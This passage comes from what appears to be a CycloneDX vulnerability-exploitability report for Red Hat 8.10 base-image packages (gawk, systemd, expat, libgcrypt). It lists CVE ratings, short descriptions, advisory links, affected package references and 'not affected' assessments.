          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-40553",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        121
      ],
      "description": "Buffer overflow vulnerability has been found in \"extension/readdir.c\" program file of gawk (ftype()\u00a0routine). This issue could be used to crash the program and potentially to achieve code execution, although the latter has not been confirmed to be feasible. It affects\u00a0gawk in versions 5.4.0 and below.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-40553"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-40553"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-40467"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/gawk.git/commit/?id=cca0366144336b49aaa7d5d949966ce8e2c70843"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40553"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8588-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40553"
        }
      ],
      "published": "2026-07-13T13:16:37+00:00",
      "updated": "2026-07-14T01:10:20+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.2.1-4.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4105",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "cwes": [
        284
      ],
      "description": "A flaw was found in systemd. The systemd-machined service contains an Improper Access Control vulnerability due to insufficient validation of the class parameter in the RegisterMachine D-Bus (Desktop Bus) method. A local unprivileged user can exploit this by attempting to register a machine with a specific class value, which may leave behind a usable, attacker-controlled machine object. This allows the attacker to invoke methods on the privileged object, leading to the execution of arbitrary commands with root privileges on the host system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4105"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7299"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4105"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447262"
        },
        {
          "url": "https://github.com/systemd/systemd/security/advisories/GHSA-4h6x-r8vx-3862"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4105"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4105"
        }
      ],
      "published": "2026-03-13T19:55:13+00:00",
      "updated": "2026-06-17T10:55:59+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41080",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        331
      ],
      "description": "libexpat before 2.8.0 uses insufficient entropy, and thus hash flooding can occur via a crafted XML document.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41080"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/26/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41080"
        },
        {
          "url": "https://blog.hartwork.org/posts/expat-2-8-0-released/"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/47"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1183"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41080"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41080"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/26/1"
        }
      ],
      "published": "2026-04-16T17:16:54+00:00",
      "updated": "2026-07-14T13:18:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41989",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Libgcrypt before 1.12.2 sometimes allows a heap-based buffer overflow and denial of service via crafted ECDH ciphertext to gcry_pk_decrypt.",
      "recommendation": "Upgrade libgcrypt to version 1.8.5-8.el8_10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41989"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50144"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50147"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41989"
        },
        {
          "url": "https://bugzilla.redhat.com/2461063"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461063"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-019113.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
